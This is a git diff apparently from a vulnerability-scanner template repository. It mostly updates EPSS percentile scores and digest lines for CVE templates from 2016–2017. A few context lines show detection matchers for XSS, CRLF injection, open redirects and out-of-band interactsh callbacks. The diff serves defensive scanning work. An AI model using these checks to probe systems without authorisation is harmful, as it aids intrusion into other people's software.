CVE-2016-10956 cwe-id: CWE-20 epss-score: 0.01913 - epss-percentile: 0.87271 + epss-percentile: 0.87288 cpe: cpe:2.3:a:mail-masta_project:mail-masta:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 2 @@ -45,4 +45,5 @@ http: status: - 200 - 500 -# digest: 4b0a00483046022100b410d7d1262e374654ca6a24a6b5938fedd537ec7539cc3fb7a72d78afe467b2022100ad2e8828a363840a54a369f61172118ae1c8496e31e02e254ba9c0f6a81aec11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100b410d7d1262e374654ca6a24a6b5938fedd537ec7539cc3fb7a72d78afe467b2022100ad2e8828a363840a54a369f61172118ae1c8496e31e02e254ba9c0f6a81aec11:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-10960.yaml b/http/cves/2016/CVE-2016-10960.yaml index b5ce128dc8..89dea05595 100644 --- a/http/cves/2016/CVE-2016-10960.yaml +++ b/http/cves/2016/CVE-2016-10960.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-10960 cwe-id: CWE-20 epss-score: 0.01127 - epss-percentile: 0.8307 + epss-percentile: 0.83087 cpe: cpe:2.3:a:joomlaserviceprovider:wsecure:*:*:*:*:lite:wordpress:*:* metadata: max-request: 1 @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cb55961b104ae6c6e28d72d8246bcf4c06bb6f2199efb06ea4630a8be470f64b022100d92e9e47eb03f4a213ce67c8931fb929ab17ef5a28f0f3d28aa5e27afad58e45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100cb55961b104ae6c6e28d72d8246bcf4c06bb6f2199efb06ea4630a8be470f64b022100d92e9e47eb03f4a213ce67c8931fb929ab17ef5a28f0f3d28aa5e27afad58e45:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-10973.yaml b/http/cves/2016/CVE-2016-10973.yaml index 3df787cd8d..3ce4979e1d 100644 --- a/http/cves/2016/CVE-2016-10973.yaml +++ b/http/cves/2016/CVE-2016-10973.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-10973 cwe-id: CWE-79 epss-score: 0.00177 - epss-percentile: 0.54781 + epss-percentile: 0.54795 cpe: cpe:2.3:a:brafton:brafton:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -48,4 +48,5 @@ http: - 'contains(body_2, "tab = alert(document.domain);")' - 'contains(body_2, "Brafton Article Loader")' condition: and -# digest: 4a0a0047304502206754dc149d991daafbd6cccf8dbac9062dd4f1004c081c61f16a51fdaa15d994022100b3862895d64565ad56e3a37468b1ebd833571f02042f3167493417a512fa11c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502206754dc149d991daafbd6cccf8dbac9062dd4f1004c081c61f16a51fdaa15d994022100b3862895d64565ad56e3a37468b1ebd833571f02042f3167493417a512fa11c4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml index 068ced3dc0..7be3051bb5 100644 --- a/http/cves/2016/CVE-2016-10993.yaml +++ b/http/cves/2016/CVE-2016-10993.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-10993 cwe-id: CWE-79 epss-score: 0.00245 - epss-percentile: 0.62351 + epss-percentile: 0.62369 cpe: cpe:2.3:a:scoreme_project:scoreme:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d15aa598128c2b47e140958f6eb068d11a1f5613e430148a809950860341f84a022100b5b7ff5b3b6897397a85f5ba5297cb846c279a1946cfc6e65cf75c8244f3db91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d15aa598128c2b47e140958f6eb068d11a1f5613e430148a809950860341f84a022100b5b7ff5b3b6897397a85f5ba5297cb846c279a1946cfc6e65cf75c8244f3db91:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-1555.yaml b/http/cves/2016/CVE-2016-1555.yaml index 2491f798bb..93591a222a 100644 --- a/http/cves/2016/CVE-2016-1555.yaml +++ b/http/cves/2016/CVE-2016-1555.yaml @@ -42,4 +42,5 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a00473045022100b589a2b32ba19d7f506b7ed6af5fe7e4a3169bd8fbbe9edb1059206d4051fd1c02206f742060f0bf741b31a1e015de9ccd8189f893afa8bcc7289d93a530a910aa96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b589a2b32ba19d7f506b7ed6af5fe7e4a3169bd8fbbe9edb1059206d4051fd1c02206f742060f0bf741b31a1e015de9ccd8189f893afa8bcc7289d93a530a910aa96:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml index 7890708476..52a0f3622d 100644 --- a/http/cves/2016/CVE-2016-2389.yaml +++ b/http/cves/2016/CVE-2016-2389.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-2389 cwe-id: CWE-22 epss-score: 0.24589 - epss-percentile: 0.96103 + epss-percentile: 0.96107 cpe: cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d7e6cd49940e23aed2a09da70781cb4182aa4920e55778731707731d40b7b549022100d2a953ac07d4013368175b2f2679cac0185270749849805dfd05afda499a54e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d7e6cd49940e23aed2a09da70781cb4182aa4920e55778731707731d40b7b549022100d2a953ac07d4013368175b2f2679cac0185270749849805dfd05afda499a54e1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml index ae8f99c072..1129fa048d 100644 --- a/http/cves/2016/CVE-2016-3088.yaml +++ b/http/cves/2016/CVE-2016-3088.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-3088 cwe-id: CWE-20 epss-score: 0.83955 - epss-percentile: 0.98122 + epss-percentile: 0.98125 cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -48,4 +48,5 @@ http: - "status_code_2==200" - "contains((body_2), '{{rand1}}')" condition: and -# digest: 490a004630440220603cf3b86cb23238a73ea463a9765aa883396dccda40b8a5ce72d8dee5b48b39022047b0f89cda1af558de1c8dbf5a777e15e7e7080828cb9b5c2609c3ddae5f7c2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220603cf3b86cb23238a73ea463a9765aa883396dccda40b8a5ce72d8dee5b48b39022047b0f89cda1af558de1c8dbf5a777e15e7e7080828cb9b5c2609c3ddae5f7c2b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-3978.yaml b/http/cves/2016/CVE-2016-3978.yaml index 9d7f2ee7df..4ae2e45dd0 100644 --- a/http/cves/2016/CVE-2016-3978.yaml +++ b/http/cves/2016/CVE-2016-3978.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-3978 cwe-id: CWE-79 epss-score: 0.00217 - epss-percentile: 0.59591 + epss-percentile: 0.59612 cpe: cpe:2.3:o:fortinet:fortios:5.0.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -36,4 +36,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100c94bb68f2c3238c7c56ab598671ad5abd276fd8f73bda0388e3ea68e88abc83e022100f32bf2d87fe9bc6450adfe960cca7496b1a23eb470c25e8609704c742485d250:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c94bb68f2c3238c7c56ab598671ad5abd276fd8f73bda0388e3ea68e88abc83e022100f32bf2d87fe9bc6450adfe960cca7496b1a23eb470c25e8609704c742485d250:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-4437.yaml b/http/cves/2016/CVE-2016-4437.yaml index 83194db8f1..33a7eb25c5 100644 --- a/http/cves/2016/CVE-2016-4437.yaml +++ b/http/cves/2016/CVE-2016-4437.yaml @@ -41,4 +41,5 @@ http: part: interactsh_protocol words: - dns -# digest: 4a0a00473045022100987c28b3eeeeefe697342bb6f6823d6c722cee9a8c9ac6fc4e5b61b64c64ad1002205647ed631c9ed87cedc4fafee8edd61281ffcf50226428eea24086b7e972ca22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100987c28b3eeeeefe697342bb6f6823d6c722cee9a8c9ac6fc4e5b61b64c64ad1002205647ed631c9ed87cedc4fafee8edd61281ffcf50226428eea24086b7e972ca22:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-4975.yaml b/http/cves/2016/CVE-2016-4975.yaml index 3a5ced770b..0a5f5744af 100644 --- a/http/cves/2016/CVE-2016-4975.yaml +++ b/http/cves/2016/CVE-2016-4975.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-4975 cwe-id: CWE-93 epss-score: 0.00428 - epss-percentile: 0.71621 + epss-percentile: 0.71636 cpe: cpe:2.3:a:apache:http_server:2.2.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -36,4 +36,5 @@ http: part: header regex: - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' -# digest: 4a0a00473045022008b2d047984c4c9cc384341b556e146a8925e84daab2b334553f77eacca815ac0221008c699b18ad67ded63d6c83bd36bcaf2c807591d5b0b51f9d0f0b7d03f5f22158:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022008b2d047984c4c9cc384341b556e146a8925e84daab2b334553f77eacca815ac0221008c699b18ad67ded63d6c83bd36bcaf2c807591d5b0b51f9d0f0b7d03f5f22158:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-4977.yaml b/http/cves/2016/CVE-2016-4977.yaml index 903491b1c0..95851de707 100644 --- a/http/cves/2016/CVE-2016-4977.yaml +++ b/http/cves/2016/CVE-2016-4977.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-4977 cwe-id: CWE-19 epss-score: 0.03345 - epss-percentile: 0.90296 + epss-percentile: 0.90303 cpe: cpe:2.3:a:pivotal:spring_security_oauth:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 400 -# digest: 490a00463044022003b1239ee648ddd6d4912a213e3ad358839304a83b6a46d0ebc6bff13690432a02207b48c42cdbf58318ee885b8a111e824483d0b2dad2b0cd930918a1996d90a91b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022003b1239ee648ddd6d4912a213e3ad358839304a83b6a46d0ebc6bff13690432a02207b48c42cdbf58318ee885b8a111e824483d0b2dad2b0cd930918a1996d90a91b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-5649.yaml b/http/cves/2016/CVE-2016-5649.yaml index 81153ac607..763730b5f6 100644 --- a/http/cves/2016/CVE-2016-5649.yaml +++ b/http/cves/2016/CVE-2016-5649.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-5649 cwe-id: CWE-200,CWE-319 epss-score: 0.15148 - epss-percentile: 0.95225 + epss-percentile: 0.95231 cpe: cpe:2.3:o:netgear:dgn2200_firmware:1.0.0.50_7.0.50:*:*:*:*:*:*:* metadata: max-request: 1 @@ -50,4 +50,5 @@ http: regex: - 'Success "([a-z]+)"' part: body -# digest: 490a004630440220066fd906716254d5917cc93fcc386887717e79cdd7ae9200ce88e3a643ffdf7b022065830420cc80458c5cbcd7f270a98d083095f713b7d15bc91b88d3a5028a1245:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220066fd906716254d5917cc93fcc386887717e79cdd7ae9200ce88e3a643ffdf7b022065830420cc80458c5cbcd7f270a98d083095f713b7d15bc91b88d3a5028a1245:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml index 2064c0f703..9a2d027c83 100644 --- a/http/cves/2016/CVE-2016-6195.yaml +++ b/http/cves/2016/CVE-2016-6195.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-6195 cwe-id: CWE-89 epss-score: 0.00284 - epss-percentile: 0.65202 + epss-percentile: 0.65222 cpe: cpe:2.3:a:vbulletin:vbulletin:*:patch_level_4:*:*:*:*:*:* metadata: verified: "true" @@ -54,4 +54,5 @@ http: - 200 - 503 condition: or -# digest: 4a0a004730450220148de5e061a5fe3c6251106bab498d7528013e666aa29dec23d9e56137ecc6e3022100bff36120bf8be39928532a80d88f9b499c3209b24b6514ec62efea47503690e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220148de5e061a5fe3c6251106bab498d7528013e666aa29dec23d9e56137ecc6e3022100bff36120bf8be39928532a80d88f9b499c3209b24b6514ec62efea47503690e7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-6277.yaml b/http/cves/2016/CVE-2016-6277.yaml index b14ba0f27e..04a04dbe53 100644 --- a/http/cves/2016/CVE-2016-6277.yaml +++ b/http/cves/2016/CVE-2016-6277.yaml @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206775efc5bf9eda40a73a53b5169085f2193d8b9f5f421ca398c1b084c14ec3ff022100f1431c2fb7e0c6738c1a50f0ccfc815f7da5811487d5cdae95c1724e397afbb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502206775efc5bf9eda40a73a53b5169085f2193d8b9f5f421ca398c1b084c14ec3ff022100f1431c2fb7e0c6738c1a50f0ccfc815f7da5811487d5cdae95c1724e397afbb0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-7552.yaml b/http/cves/2016/CVE-2016-7552.yaml index 6d92997887..5bbbede4d4 100644 --- a/http/cves/2016/CVE-2016-7552.yaml +++ b/http/cves/2016/CVE-2016-7552.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-7552 cwe-id: CWE-22 epss-score: 0.97004 - epss-percentile: 0.99651 + epss-percentile: 0.99653 cpe: cpe:2.3:a:trendmicro:threat_discovery_appliance:2.6.1062:r1:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-7834.yaml b/http/cves/2016/CVE-2016-7834.yaml index bcf5c859bb..6caaa9f5c7 100644 --- a/http/cves/2016/CVE-2016-7834.yaml +++ b/http/cves/2016/CVE-2016-7834.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-7834 cwe-id: CWE-200 epss-score: 0.00202 - epss-percentile: 0.58004 + epss-percentile: 0.58024 cpe: cpe:2.3:o:sony:snc_series_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -48,4 +48,5 @@ http: - type: status status: - 204 -# digest: 4a0a0047304502202f7bc52036f233ade130676b1a542d6672a856b8e2cdf935002e9574522633af022100ebded8eb1eeb3064f789355e6da69d70754e8df600ac7867bbab33b786c837ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502202f7bc52036f233ade130676b1a542d6672a856b8e2cdf935002e9574522633af022100ebded8eb1eeb3064f789355e6da69d70754e8df600ac7867bbab33b786c837ad:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-7981.yaml b/http/cves/2016/CVE-2016-7981.yaml index 425ba5b395..2886c257f1 100644 --- a/http/cves/2016/CVE-2016-7981.yaml +++ b/http/cves/2016/CVE-2016-7981.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-7981 cwe-id: CWE-79 epss-score: 0.00258 - epss-percentile: 0.63358 + epss-percentile: 0.63375 cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e8576c03b674ff569e35c617d3979a70cde9a211857142af09419eb6c2535644022100ef720c72ad1d65302c5fa04b53b637365fb2fbba25edab3eefa5e78b5048665a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100e8576c03b674ff569e35c617d3979a70cde9a211857142af09419eb6c2535644022100ef720c72ad1d65302c5fa04b53b637365fb2fbba25edab3eefa5e78b5048665a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-8527.yaml b/http/cves/2016/CVE-2016-8527.yaml index f2229cb47a..6aed970409 100644 --- a/http/cves/2016/CVE-2016-8527.yaml +++ b/http/cves/2016/CVE-2016-8527.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-8527 cwe-id: CWE-79 epss-score: 0.0024 - epss-percentile: 0.61851 + epss-percentile: 0.61869 cpe: cpe:2.3:a:hp:airwave:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022067afba97a3c1f9d4883ae2a131a673ebce25c652be1bb2bd534db42d34652860022100a30be300f2ef829bc281d125ffc08253c388e160c808ba21f47548b7db45caf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022067afba97a3c1f9d4883ae2a131a673ebce25c652be1bb2bd534db42d34652860022100a30be300f2ef829bc281d125ffc08253c388e160c808ba21f47548b7db45caf8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml index d7f2903f4f..843b28929f 100644 --- a/http/cves/2017/CVE-2017-0929.yaml +++ b/http/cves/2017/CVE-2017-0929.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-0929 cwe-id: CWE-918 epss-score: 0.03588 - epss-percentile: 0.90588 + epss-percentile: 0.90595 cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 500 -# digest: 4a0a004730450221008a0ffe3bf6999a6ab86201614673d3aca46be290b8c77008f649504256f7a6a502201f0eb82ecb1070609be7ddbb458fefc12c609ee2be6c18f7c9b90b3afaa1b13a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221008a0ffe3bf6999a6ab86201614673d3aca46be290b8c77008f649504256f7a6a502201f0eb82ecb1070609be7ddbb458fefc12c609ee2be6c18f7c9b90b3afaa1b13a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-1000029.yaml b/http/cves/2017/CVE-2017-1000029.yaml index 5c10d66115..7139b35bc7 100644 --- a/http/cves/2017/CVE-2017-1000029.yaml +++ b/http/cves/2017/CVE-2017-1000029.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-1000029 cwe-id: CWE-200 epss-score: 0.00387 - epss-percentile: 0.70229 + epss-percentile: 0.70248 cpe: cpe:2.3:a:oracle:glassfish_server:3.0.1:*:*:*:open_source:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a18dc7393df9179d18c3db3b4e4539eb0eaa9c5b650d3803b29274dc14b1427102204517d81ec64845e9081f0febad2be6fae680c24299c3a0ddad350456435708cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a18dc7393df9179d18c3db3b4e4539eb0eaa9c5b650d3803b29274dc14b1427102204517d81ec64845e9081f0febad2be6fae680c24299c3a0ddad350456435708cd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-1000163.yaml b/http/cves/2017/CVE-2017-1000163.yaml index 364a2ec492..156b6fd90a 100644 --- a/http/cves/2017/CVE-2017-1000163.yaml +++ b/http/cves/2017/CVE-2017-1000163.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-1000163 cwe-id: CWE-601 epss-score: 0.00154 - epss-percentile: 0.51624 + epss-percentile: 0.51637 cpe: cpe:2.3:a:phoenixframework:phoenix:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -35,4 +35,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' -# digest: 4a0a0047304502206f4828415f2bb1b65f98cfd38f1149d459b634627d0640a05052604c631c0ebf022100f663e48eca9619f74e0275c99d70bcf2e3c655ede185e3085928570c420f3ede:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502206f4828415f2bb1b65f98cfd38f1149d459b634627d0640a05052604c631c0ebf022100f663e48eca9619f74e0275c99d70bcf2e3c655ede185e3085928570c420f3ede:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-1000170.yaml b/http/cves/2017/CVE-2017-1000170.yaml index e4898281a6..9c6db6b41e 100644 --- a/http/cves/2017/CVE-2017-1000170.yaml +++ b/http/cves/2017/CVE-2017-1000170.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-1000170 cwe-id: CWE-22 epss-score: 0.70305 - epss-percentile: 0.97665 + epss-percentile: 0.97669 cpe: cpe:2.3:a:jqueryfiletree_project:jqueryfiletree:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022016116d772705a276c34480c0f9627376e52e7eda6bb5995cfb901c2efd1841d2022100d68242df604b1cb72ff4f31bcf3995befc0f90226bd7a36dc890282eb3fc3364:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022016116d772705a276c34480c0f9627376e52e7eda6bb5995cfb901c2efd1841d2022100d68242df604b1cb72ff4f31bcf3995befc0f90226bd7a36dc890282eb3fc3364:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-1000486.yaml b/http/cves/2017/CVE-2017-1000486.yaml index e1da7dff86..89b4459afe 100644 --- a/http/cves/2017/CVE-2017-1000486.yaml +++ b/http/cves/2017/CVE-2017-1000486.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-1000486 cwe-id: CWE-326 epss-score: 0.96894 - epss-percentile: 0.99613 + epss-percentile: 0.99615 cpe: cpe:2.3:a:primetek:primefaces:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,5 @@ http: part: header words: - 'Mogwailabs: CHECKCHECK' -# digest: 4a0a004730450221009751eeea38d45a9d90ecd16eb749a67cf3b7a988e8f6ae1b5a314b3facb6699d02205f18bd8a9d0fea8b08944d7f5df18afaa65925804041f988b6d2c6df15d27ab6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221009751eeea38d45a9d90ecd16eb749a67cf3b7a988e8f6ae1b5a314b3facb6699d02205f18bd8a9d0fea8b08944d7f5df18afaa65925804041f988b6d2c6df15d27ab6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-10075.yaml b/http/cves/2017/CVE-2017-10075.yaml index c16b436945..620eda6c51 100644 --- a/http/cves/2017/CVE-2017-10075.yaml +++ b/http/cves/2017/CVE-2017-10075.yaml @@ -18,7 +18,7 @@ info: cvss-score: 8.2 cve-id: CVE-2017-10075 epss-score: 0.00409 - epss-percentile: 0.71014 + epss-percentile: 0.7103 cpe: cpe:2.3:a:oracle:webcenter_content:11.1.1.9.0:*:*:*:*:*:*:* metadata: verified: true @@ -53,4 +53,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200094c53c9a11b9878cbbbe6f57f0afdce6bdbfee18700b93e314ebd737d817be0221009b381aae59dfef2fe5b1aa0452c59222be6a52bec0976f0ad8839ddfd9227d3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200094c53c9a11b9878cbbbe6f57f0afdce6bdbfee18700b93e314ebd737d817be0221009b381aae59dfef2fe5b1aa0452c59222be6a52bec0976f0ad8839ddfd9227d3c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-10974.yaml b/http/cves/2017/CVE-2017-10974.yaml index 4e41f564af..0d7e88514c 100644 --- a/http/cves/2017/CVE-2017-10974.yaml +++ b/http/cves/2017/CVE-2017-10974.yaml @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f0ee16bfd334202d34e82770eefdde767c08a4a012e6d89aa68a09001f56ba4802206bad82fe19a84739fa0bc6c97f5cf233c4d3cb583393472ad20a3ddba34daa6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100f0ee16bfd334202d34e82770eefdde767c08a4a012e6d89aa68a09001f56ba4802206bad82fe19a84739fa0bc6c97f5cf233c4d3cb583393472ad20a3ddba34daa6a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-11165.yaml b/http/cves/2017/CVE-2017-11165.yaml index 61697de704..d069a75f6c 100644 --- a/http/cves/2017/CVE-2017-11165.yaml +++ b/http/cves/2017/CVE-2017-11165.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-11165 cwe-id: CWE-200 epss-score: 0.94336 - epss-percentile: 0.98956 + epss-percentile: 0.98959 cpe: cpe:2.3:o:datataker:dt80_dex_firmware:1.50.012:*:*:*:*:*:*:* metadata: verified: true @@ -51,4 +51,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100da68591ff898e55aeaa90134b84db80d0455137f677660cbd23b3af8b598e3bb0221008ecee9ce21ebba194e5a217ea052cf06f46749ddee3437462c610c4f8a0984d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100da68591ff898e55aeaa90134b84db80d0455137f677660cbd23b3af8b598e3bb0221008ecee9ce21ebba194e5a217ea052cf06f46749ddee3437462c610c4f8a0984d9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-11444.yaml b/http/cves/2017/CVE-2017-11444.yaml index 276a8a85e0..3888d1ae70 100644 --- a/http/cves/2017/CVE-2017-11444.yaml +++ b/http/cves/2017/CVE-2017-11444.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-11444 cwe-id: CWE-89 epss-score: 0.04447 - epss-percentile: 0.91464 + epss-percentile: 0.9147 cpe: cpe:2.3:a:intelliants:subrion_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202d82ea1ffa946dcf776ec5c2d69adc0af06854bcf30f56d8ca2d16109225397b022100858e832d405ce9e48e140e1799bb3df9a93f314dbcfa0846fe5c6357c37f8555:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502202d82ea1ffa946dcf776ec5c2d69adc0af06854bcf30f56d8ca2d16109225397b022100858e832d405ce9e48e140e1799bb3df9a93f314dbcfa0846fe5c6357c37f8555:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-11512.yaml b/http/cves/2017/CVE-2017-11512.yaml index e9326027ff..fe2382de15 100644 --- a/http/cves/2017/CVE-2017-11512.yaml +++ b/http/cves/2017/CVE-2017-11512.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-11512 cwe-id: CWE-22 epss-score: 0.97175 - epss-percentile: 0.99741 + epss-percentile: 0.99744 cpe: cpe:2.3:a:manageengine:servicedesk:9.3.9328:*:*:*:*:*:*:* metadata: verified: true @@ -43,4 +43,5 @@ http: - "fonts" - "extensions" condition: and -# digest: 4a0a00473045022100a18619c03a0b427a82dd2ef8ecb0eab1b0b5e1953015bcd99ec632883aaa7be90220648b05dd5516a786c50c1201fa5c9ae7a86f75799882a0432e68edb6232b05db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a18619c03a0b427a82dd2ef8ecb0eab1b0b5e1953015bcd99ec632883aaa7be90220648b05dd5516a786c50c1201fa5c9ae7a86f75799882a0432e68edb6232b05db:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-11586.yaml b/http/cves/2017/CVE-2017-11586.yaml index 27d8e8a136..c45c790d6d 100644 --- a/http/cves/2017/CVE-2017-11586.yaml +++ b/http/cves/2017/CVE-2017-11586.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-11586 cwe-id: CWE-601 epss-score: 0.00121 - epss-percentile: 0.46111 + epss-percentile: 0.46136 cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:* metadata: verified: true @@ -44,4 +44,5 @@ http: part: header regex: - 'Refresh:(.*)url=http:\/\/interact\.sh' -# digest: 4b0a00483046022100d947622b6f30567bdb3565e3c1f3e2c9323b408e15b422044150fdcd97fdfcf8022100a9faadc15f735b2dfcff5be8e876fcdf22d4a47250caec09b46847e100de1ce6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d947622b6f30567bdb3565e3c1f3e2c9323b408e15b422044150fdcd97fdfcf8022100a9faadc15f735b2dfcff5be8e876fcdf22d4a47250caec09b46847e100de1ce6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-11629.yaml 